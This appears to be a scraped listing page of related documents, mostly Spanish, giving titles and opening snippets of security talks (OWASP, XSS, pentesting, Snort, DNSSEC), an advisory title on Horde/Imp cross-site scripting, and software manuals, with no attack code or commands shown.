Impacto del ENS: Propuesta Oracle Xavier Martorell Sales Identidad y Seguridad Objetivo del Esquema Nacional de Seguridad La finalidad del Esquema Nacional de Seguridad es la creación
Más detallesDetectar y solucionar infecciones en un sitio web
Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales
Más detallesServicios de Seguridad de la Información
Servicios de Seguridad de la Información Las siguientes actuaciones son medidas dirigidas a garantizar la Confidencialidad, Privacidad y Disponibilidad de los Servicios de la Información y que podemos
Más detallesAbout Me. Mario Robles Tencio
About Me Mario Robles Tencio Profesional de seguridad +10 años de experiencia en tema de seguridad de redes, desarrollo de aplicaciones web, seguridad de aplicaciones web, PenTesting (Ethical Hacking)
Más detallesDe los #exploits al más m s allá!
De los #exploits al más m s allá! Joaquín Paredes Senior Security Consultant Ing. Iván Huertas Security Consultant 1 Agenda Tendencias en Seguridad para el 2013: APT como tendencia destacada APT & Botnets
Más detallesAuditoría de Seguridad
Auditoría de Seguridad Introducción Tipos auditoría Externa Caja Negra Interna Caja Blanca Informes Valoración sistema Oferta y Tarificación Recursos Formación - certificaciones Auditoría de Seguridad
Más detallesMANUAL EASYCHAIR. A) Ingresar su nombre de usuario y password, si ya tiene una cuenta registrada Ó
MANUAL EASYCHAIR La URL para enviar su propuesta a la convocatoria es: https://easychair.org/conferences/?conf=genconciencia2015 Donde aparece la siguiente pantalla: Se encuentran dos opciones: A) Ingresar
Más detallesRoberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014
Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador
Más detallesGastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia
Gastón Toth gaston.toth@owasp.org Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Dónde queda OWASP Patagonia? Webapp pentesting...desde un enfoque no muy técnico Penetration testing
Más detallesMANUAL EASYCHAIR. https://www.easychair.org/account/signin.cgi?conf=cnicc2013
MANUAL EASYCHAIR La URL para enviar su artículo al congreso es: https://www.easychair.org/account/signin.cgi?conf=cnicc2013 Donde aparece la siguiente pantalla: En este punto hay dos opciones: A) Teclear
Más detallesSecuriza tu red con Snort y sus amigos
www.securityartwork.es www.s2grupo.es Securiza tu red con Snort y sus amigos José Luis Chica Uribe Técnico de seguridad IT jchica@s2grupo.es Índice Seguridad: conceptos Tipos de ataques Cómo defenderse?
Más detallesBuenas Prácticas de Seguridad en el uso de dispositivos móviles. Alfredo Aranguren Tarazona, CISSP, CISA, CISM
Buenas Prácticas de Seguridad en el uso de dispositivos móviles 1 32% de los usuarios creen que no se requiere software de seguridad en sus dispositivos móviles Fuente: McAfee 2 Estado actual de la seguridad
Más detallesCAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS
Capítulo 2 Sistemas de Detección de Intrusos 7 CAPÍTULO 2: SISTEMAS DE DETECCIÓN DE INTRUSOS En este capítulo se definen los sistemas de detección de intrusos y su relación con los ataques basados en el
Más detallesWDpStats Procedimiento de instalación
WDpStats Procedimiento de instalación Tabla de contenidos WDpStats... 1 Procedimiento de instalación... 1 Tabla de contenidos... 1 Resumen... 2 Requisitos... 2 Instalación... 2 Dificultades... 6 Ejecución...
Más detallesCélula UABC-Live.net. Universidad Autónoma. de Baja California. http://uabc-live-net.spaces.live.com/ Facultad de Ciencias Químicas.
Célula Académica UABC-Live.net Universidad Autónoma de Baja California Facultad de Ciencias Químicas e Ingeniería http://uabc-live-net.spaces.live.com/ Sesión n No. 7 CardSpace Expositores: Blanca Patricia
Más detallesSSL Secure Socket Layer
Universidad Interamericana de Puerto Rico Recinto de Bayamón Departamento de Informática SSL Secure Socket Layer Profesor: Luis M. Cardona Hernández Seguridad en las Redes Definición SSL (Secure Sockets
Más detallesGuía Rápida de uso y administración de Sympa
Guía Rápida de uso y administración de Sympa Acciones más habituales Versión 6.1.14 Unidad de Correo Electrónico 14/10/2015 La finalidad de este documento es resumir los procedimientos más habituales y
Más detallesImpacto del ENS: Propuesta Oracle
Impacto del ENS: Propuesta Oracle Jose Manuel Rodríguez de Llano Sales Manager Identidad y Seguridad Objetivo del Esquema Nacional de Seguridad La finalidad del Esquema Nacional de
Más detalles==== Introducción. ==== Buscando un fallo
=============================== Horde/Imp: Cross Site Scripting in Email Subject =============================== FraMe - frame at kernelpanik.org http://www.kernelpanik.org ===============================
Más detallesPruebas de Seguridad en aplicaciones web segun OWASP Donde estamos... Hacia donde vamos?
Venezuela The Foundation http://www.owasp.org Chapter Pruebas de Seguridad en aplicaciones web segun Donde estamos... Hacia donde vamos? Edgar D. Salazar T Venezuela Chapter Leader edgar.salazar@owasp.org
Más detallesCapítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable
Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)
Más detallesOWASP Day Costa Rica
OWASP Day Costa Rica En contra de la delincuencia Cibernética Michael Hidalgo michael.hidalgo@owasp.org Chapter Leader OWASP Costa Rica Colaborador OWASP O2 Platform Project Acerca de Mi Software Developer
Más detallesSegurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web
Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay hsantiso@claro.com.ar Introducción El problema
Más detallesCreating your Single Sign-On Account for the PowerSchool Parent Portal
Creating your Single Sign-On Account for the PowerSchool Parent Portal Welcome to the Parent Single Sign-On. What does that mean? Parent Single Sign-On offers a number of benefits, including access to
Más detallesInstalación y configuración de Windows SharePoint Services (WSS) 2003
Instalación y configuración de Windows SharePoint Services (WSS) 2003 Autor : Gustavo Velez Para : www.gavd.net/servers Fecha : 15-01-2005 Versión : 1.0.1 Prerrequisitos para la instalación: Windows 2003
Más detallesSeguridad en el ciclo de vida del software
Seguridad en el ciclo de vida del software Pablo Miño - CISSP Agenda Importancia del software Seguridad en capas Por qué el software falla? Conceptos de seguridad Ciclo de vida Agenda Importancia del software
Más detallesDesarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals
Desarrollo de Código Seguro 22 y 27 de Septiembre de 2004 Facultad Regional Concepción del Uruguay Universidad Tecnológica Nacional Gabriel Arellano arellanog@frcu.utn.edu.ar Seguridad en PHP Lineamientos
Más detallesRETO HACKER DE VERANO
RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque
Más detallesAgenda. I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar
Agenda I. Presentación II.Antecedentes III.Distintos ámbitos IV.A jugar Juan Antonio Calles (@jantoniocalles) Quiénes somos? Jefe de Proyectos de Seguridad en everis www.flu-project.com elblogdecalles.blogspot.com
Más detallesIntroducción a la Firma Electrónica en MIDAS
Introducción a la Firma Electrónica en MIDAS Firma Digital Introducción. El Módulo para la Integración de Documentos y Acceso a los Sistemas(MIDAS) emplea la firma digital como método de aseguramiento
Más detallesCiberdefensa Desafíos tecnológicos. Hugo Carrión G. Junio, 2014
Ciberdefensa Desafíos tecnológicos Hugo Carrión G. Junio, 2014 Clasificación y Control de Activos El nuevo valor de la información requiere indiscutiblemente un alto nivel de seguridad a fin de lograr
Más detallesProgramación páginas web con ASP.NET 3.5 (C#)
Horas de teoría: 40 Horas de práctica: 40 Programación páginas web con ASP.NET 3.5 (C#) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript
Más detallesMANUAL SISTEMA RESERVAS TEM V1.2
MANUAL SISTEMA RESERVAS TEM V1.2 1. PANTALLA INICIAL DE LA APLICACIÓN Imagen 1 En la imagen 1 se presenta la página de inicio de la aplicación en la que tendremos que logarnos mediante el nombre de usuario
Más detallesResumen del trabajo sobre DNSSEC
Resumen del trabajo sobre Contenido 1. -...2 1.1. - Definición...2 1.2. - Seguridad basada en cifrado...2 1.3. - Cadenas de confianza...3 1.4. - Confianzas...4 1.5. - Islas de confianza...4 2. - Conclusiones...5
Más detallesUSCIS ELIS Guía para Pago de la Tarifa de Inmigrante
USCIS ELIS Guía para Pago de la Tarifa de Inmigrante Paso 1 Escriba uscis.gov/uscis-elis en su navegador de Internet y haga clic en Log in to USCIS ELIS (Iniciar sesión de USCIS ELIS) para acceder a USCIS
Más detallesMySQL: Guía de Referencia
Instituto Tecnologico Superior de Coatzacoalcos (ITESCO). MySQL: Guía de Referencia Farid Alfredo Bielma Lopez fbielma@fbielma.org http://fbielma.org/course/fbielma/curso_mysql.pdf Resumen del curso Algunas
Más detallesCurso Online. Desarrollo Seguro en Java
Curso Online Desarrollo Seguro en Java Índice: >> Plan de estudios >> Introducción >> A quién va dirigido >> Metodología >> Dinámica >> Contenido Cursos Online Plan de estudios: Itinerario Formativo por
Más detallesPOLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE
POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE 1 Obje%vo El asistente aprenderá los conceptos básicos sobre los
Más detallesArmas del CISO Actual. OWASP Venezuela OWASP Uruguay
Armas del CISO Actual Edgar Salazar Mateo Martínez OWASP Venezuela OWASP Uruguay OWASP 14 Años de servicio a la comunidad 170 Proyectos Activos 200 Capítulos Activos 43,000+ Participantes en listas de
Más detallesPresentación de BlackBerry Collaboration Service
Presentación de Collaboration Service Presentación de Collaboration Service Remitente Servidor de mensajería instantánea Collaboration Service Dispositivo con 10 Destinatario 1 de 13 Presentación de Collaboration
Más detallesQuienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)
CON Quienes somos Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del
Más detallesSu Seguridad es Nuestro Éxito
Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio
Más detallesOWASP Testing Guide. John Vargas Open-Sec Senior Security Consultant OWASP Perú Chapter Leader John.Vargas@owasp.org @John_Vargas / @OWASP_Peru
OWASP Testing Guide John Vargas Open-Sec Senior Security Consultant OWASP Perú Chapter Leader John.Vargas@owasp.org @John_Vargas / @OWASP_Peru The OWASP Foundation http://www.owasp.org Derechos de Autor
Más detallesIBM Software Demos Integración de Tivoli Identity Manager y Directory Integrator
Tivoli_Identity_Manager_Directory_Integrator_Integration_D_Dec05 1a 0:13 Las soluciones de gestión de seguridad IBM Tivoli responden a dos desafíos críticos para la empresa electrónica: gestión automática
Más detallesPreguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información
Guía de Cifrado Preguntas y respuestas sobre el cifrado de la información personal La guía para aprender a cifrar tu información 2 Qué es lo que estamos cuidando? A través del cifrado cuidamos de fotos,
Más detallesTest de intrusión (Penetration Test) Introducción
Test de intrusión (Penetration Test) Introducción Nos encontramos en una época en donde las empresas están sufriendo ataques informáticos cada vez en forma más asidua, basta con ver los informes anuales
Más detallesMedidas preventivas para evitar el robo de datos. José Manuel Rodriguez Sales Manager Seguridad Oracle Iberica
Medidas preventivas para evitar el robo de datos. José Manuel Rodriguez Sales Manager Seguridad Oracle Iberica This document is for informational purposes. It is not a commitment to deliver any material,
Más detallesLo valoras, Optimiti Network lo protege. Seguridad a otro nivel { DISPONIBILIDAD } { CONFIDENCIALIDAD } { INTEGRIDAD } Credenciales 2015
Lo valoras, Optimiti Network lo protege { CONFIDENCIALIDAD } { DISPONIBILIDAD } { INTEGRIDAD } Seguridad a otro nivel Credenciales 2015 En Optimiti nos enfocamos en Productos y Soluciones Innovadoras y
Más detallesInstalar y configurar W3 Total Cache
Instalar y configurar W3 Total Cache en WordPress Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com La velocidad de carga de una web influye mucho a la hora de mejorar el
Más detallesTRABAJO DE EXPOSICIÓN. Control de Acceso de Usuarios Privilegiados. René Méndez David Gonzalez. Julio 2013
TRABAJO DE EXPOSICIÓN Control de Acceso de Usuarios Privilegiados René Méndez David Gonzalez Julio 2013 Cláusula de confidencialidad: La información contenida en el presente documento ha sido elaborada
Más detalles